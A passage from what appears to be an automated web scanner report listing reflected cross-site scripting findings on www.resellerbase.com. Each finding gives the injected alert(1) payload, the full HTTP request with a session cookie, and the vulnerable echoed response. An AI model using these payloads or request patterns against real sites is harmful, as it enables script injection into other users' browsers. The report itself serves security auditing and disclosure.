The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 71f84</title><img%20src%3da%20onerror%3dalert(1)>8c9bc4619f122c768 was submitted in the REST URL parameter 2. This input was echoed as 71f84</title><img src=a onerror=alert(1)>8c9bc4619f122c768 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/ringtones71f84</title><img%20src%3da%20onerror%3dalert(1)>8c9bc4619f122c768?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/ringtones
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ringtones71f84</title><img src=a onerror=alert(1)>8c9bc4619f122c768</title>
...[SNIP]...

2.4381. http://www.resellerbase.com/tag/ringtones [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/ringtones

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89042<img%20src%3da%20onerror%3dalert(1)>d7c574db726323b09 was submitted in the REST URL parameter 2. This input was echoed as 89042<img src=a onerror=alert(1)>d7c574db726323b09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/ringtones89042<img%20src%3da%20onerror%3dalert(1)>d7c574db726323b09?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/ringtones
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ringt
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : ringtones89042<img src=a onerror=alert(1)>d7c574db726323b09]</td>
...[SNIP]...

2.4382. http://www.resellerbase.com/tag/script [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/script

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf97f<script>alert(1)</script>3f5b771c01e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagbf97f<script>alert(1)</script>3f5b771c01e/script HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagbf97f<script>alert(1)</script>3f5b771c01e/script was not found on this server.</p>
...[SNIP]...

2.4383. http://www.resellerbase.com/tag/script [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/script

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 85016<script>alert(1)</script>90639d3111c314b44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag85016<script>alert(1)</script>90639d3111c314b44/script?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/script
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag85016<script>alert(1)</script>90639d3111c314b44/script?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4384. http://www.resellerbase.com/tag/script [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/script

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload deade<img%20src%3da%20onerror%3dalert(1)>8e42d3dc17f was submitted in the REST URL parameter 2. This input was echoed as deade<img src=a onerror=alert(1)>8e42d3dc17f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/scriptdeade<img%20src%3da%20onerror%3dalert(1)>8e42d3dc17f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: scrip
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : scriptdeade<img src=a onerror=alert(1)>8e42d3dc17f]</td>
...[SNIP]...

2.4385. http://www.resellerbase.com/tag/script [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/script

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b9d92</title><img%20src%3da%20onerror%3dalert(1)>5e46d749343f33e61 was submitted in the REST URL parameter 2. This input was echoed as b9d92</title><img src=a onerror=alert(1)>5e46d749343f33e61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/scriptb9d92</title><img%20src%3da%20onerror%3dalert(1)>5e46d749343f33e61?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/script
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: scriptb9d92</title><img src=a onerror=alert(1)>5e46d749343f33e61</title>
...[SNIP]...

2.4386. http://www.resellerbase.com/tag/script [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/script

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1edd4<img%20src%3da%20onerror%3dalert(1)>973447b3bec7e5c86 was submitted in the REST URL parameter 2. This input was echoed as 1edd4<img src=a onerror=alert(1)>973447b3bec7e5c86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/script1edd4<img%20src%3da%20onerror%3dalert(1)>973447b3bec7e5c86?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/script
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: scrip
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : script1edd4<img src=a onerror=alert(1)>973447b3bec7e5c86]</td>
...[SNIP]...

2.4387. http://www.resellerbase.com/tag/script [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/script

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 51030</title><img%20src%3da%20onerror%3dalert(1)>f48f2788806 was submitted in the REST URL parameter 2. This input was echoed as 51030</title><img src=a onerror=alert(1)>f48f2788806 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/script51030</title><img%20src%3da%20onerror%3dalert(1)>f48f2788806 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: script51030</title><img src=a onerror=alert(1)>f48f2788806</title>
...[SNIP]...

2.4388. http://www.resellerbase.com/tag/search+engine+optimisation [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search+engine+optimisation

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d82f<script>alert(1)</script>c288383c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2d82f<script>alert(1)</script>c288383c7a/search+engine+optimisation HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2d82f<script>alert(1)</script>c288383c7a/search+engine+optimisation was not found on this server.</p>
...[SNIP]...

2.4389. http://www.resellerbase.com/tag/search+engine+optimization [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search+engine+optimization

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3fa1c<script>alert(1)</script>1ce6e43499c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3fa1c<script>alert(1)</script>1ce6e43499c/search+engine+optimization HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3fa1c<script>alert(1)</script>1ce6e43499c/search+engine+optimization was not found on this server.</p>
...[SNIP]...

2.4390. http://www.resellerbase.com/tag/search+engine+submission [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search+engine+submission

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a402<script>alert(1)</script>583d5101fb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4a402<script>alert(1)</script>583d5101fb7/search+engine+submission HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4a402<script>alert(1)</script>583d5101fb7/search+engine+submission was not found on this server.</p>
...[SNIP]...

2.4391. http://www.resellerbase.com/tag/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f583d<script>alert(1)</script>165208d2f1c6b7651 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagf583d<script>alert(1)</script>165208d2f1c6b7651/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:03:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf583d<script>alert(1)</script>165208d2f1c6b7651/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4392. http://www.resellerbase.com/tag/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cddeb<script>alert(1)</script>3a90e58aa7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagcddeb<script>alert(1)</script>3a90e58aa7a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagcddeb<script>alert(1)</script>3a90e58aa7a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4393. http://www.resellerbase.com/tag/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc0b<img%20src%3da%20onerror%3dalert(1)>58d75d8bfa0 was submitted in the REST URL parameter 2. This input was echoed as 9fc0b<img src=a onerror=alert(1)>58d75d8bfa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/search.php9fc0b<img%20src%3da%20onerror%3dalert(1)>58d75d8bfa0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: searc
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : search.php9fc0b<img src=a onerror=alert(1)>58d75d8bfa0]</td>
...[SNIP]...

2.4394. http://www.resellerbase.com/tag/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 99243</title><img%20src%3da%20onerror%3dalert(1)>1b14a8ad562550975 was submitted in the REST URL parameter 2. This input was echoed as 99243</title><img src=a onerror=alert(1)>1b14a8ad562550975 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/search.php99243</title><img%20src%3da%20onerror%3dalert(1)>1b14a8ad562550975?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: search.php99243</title><img src=a onerror=alert(1)>1b14a8ad562550975</title>
...[SNIP]...

2.4395. http://www.resellerbase.com/tag/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2cd24<img%20src%3da%20onerror%3dalert(1)>9ba9a3b88066d07a0 was submitted in the REST URL parameter 2. This input was echoed as 2cd24<img src=a onerror=alert(1)>9ba9a3b88066d07a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/search.php2cd24<img%20src%3da%20onerror%3dalert(1)>9ba9a3b88066d07a0?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: searc
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : search.php2cd24<img src=a onerror=alert(1)>9ba9a3b88066d07a0]</td>
...[SNIP]...

2.4396. http://www.resellerbase.com/tag/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 700a6</title><img%20src%3da%20onerror%3dalert(1)>b6dca1b5cae was submitted in the REST URL parameter 2. This input was echoed as 700a6</title><img src=a onerror=alert(1)>b6dca1b5cae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/search.php700a6</title><img%20src%3da%20onerror%3dalert(1)>b6dca1b5cae?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: search.php700a6</title><img src=a onerror=alert(1)>b6dca1b5cae</title>
...[SNIP]...

2.4397. http://www.resellerbase.com/tag/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

